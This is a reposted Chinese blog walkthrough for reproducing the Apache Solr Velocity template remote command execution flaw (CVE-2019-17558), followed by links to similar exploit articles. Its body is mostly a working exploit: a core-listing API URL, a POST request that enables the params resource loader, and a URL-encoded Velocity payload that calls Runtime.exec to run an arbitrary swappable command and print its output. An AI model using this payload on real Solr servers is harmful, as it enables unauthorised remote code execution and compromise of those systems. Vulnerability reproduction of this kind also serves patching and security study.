Solr遠程命令執行漏洞（CVE-2019-17558）

本文轉載自查看原文 2020-09-22 17:32 1467 漏洞復現

1、通過以下API獲取所有內核名稱

http://192.168.222.196:8983/solr/admin/cores?indexInfo=false&wt=json

2、啟用配置params.resource.loader.enabled，burpsuit抓包改包啟動配置

 1 POST /solr/demo/config HTTP/1.1
 2 Host: 192.168.164.162:8983
 3 Content-Type: application/json
 4 Content-Length: 259
 5 
 6 {
 7   "update-queryresponsewriter": {
 8     "startup": "lazy",
 9     "name": "velocity",
10     "class": "solr.VelocityResponseWriter",
11     "template.base.dir": "",
12     "solr.resource.loader.enabled": "true",
13     "params.resource.loader.enabled": "true"
14   }
15 }

3、通過Velocity模板執行命令，如pwd。修改exec(%27pwd%27)中的代碼即可更改命令。

http://192.168.222.196:8983/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27pwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 CVE-2019-17558漏洞復現 Apache solr遠程命令執行（CVE-2019-0193） Chrome 遠程代碼執行漏洞CVE-2019-5786-EXP Supervisord遠程命令執行漏洞（CVE-2017-11610） (CVE-2020-14645)Weblogic遠程命令執行漏洞復現 Jenkins遠程命令執行漏洞(CVE-2018-1000861) CVE-2021-22205 Gitlab遠程命令執行漏洞復現 Apache Tomcat 遠程代碼執行漏洞（CVE-2019-0232）漏洞復現遠程桌面遠程代碼執行漏洞（CVE-2019-0708）Poc Weblogic未授權遠程命令執行漏洞（CVE-2020-14882&CVE-2020-14883）復現